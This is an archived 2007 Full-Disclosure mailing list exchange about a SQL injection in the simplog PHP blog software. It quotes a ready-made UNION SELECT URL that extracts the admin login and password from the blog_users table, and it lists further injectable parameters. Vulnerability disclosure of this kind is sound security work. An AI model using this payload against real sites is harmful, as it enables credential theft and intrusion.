lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <459A3BB4.501@securax.org>
Date: Tue, 02 Jan 2007 13:02:12 +0200
From: Javor Ninov <drfrancky@...urax.org>
To: str0ke <str0ke@...w0rm.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
	bugtraq@...urityfocus.com
Subject: Re: [Full-disclosure] simplog 0.9.3.2 SQL injection

str0ke ,
looks like i reinvented the wheel :-)) . i didn't make any research. a
friend of mine installed the latest version of this software and voila...


str0ke wrote:
> Javor,
> 
> It seems rgod found this vulnerability back in April of 2006.
> 
> http://www.milw0rm.com/exploits/1663
> 
> <>
>  ii)
>  http://[target]/[path]/index.php?blogid=[sql]
>  http://[target]/[path]/archive.php?blogid=[sql]
>  http://[target]/[path]/archive.php?m=[sql]
>  http://[target]/[path]/archive.php?y=[sql]
> 
> /str0ke
> 
> On 1/1/07, Javor Ninov <drfrancky@...urax.org> wrote:
>> Afected Software:
>> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>>
>> Site:
>> http://www.simplog.org
>> Simplog provides an easy way for users to add blogging capabilities to
>> their existing websites. Simplog is written in PHP and compatible with
>> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
>> Powerful, yet simple
>>
>> Vulnerability:
>> SQL Injection in archive.php
>> other files probably also affected
>>
>> Example:
>> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>>
>>
>> Vendor status:
>> NOT NOTIFIED
>>
>>
>> Javor Ninov aka DrFrancky
>> drfrancky shift+2 securax.org
>> http://securitydot.net/
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>


Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ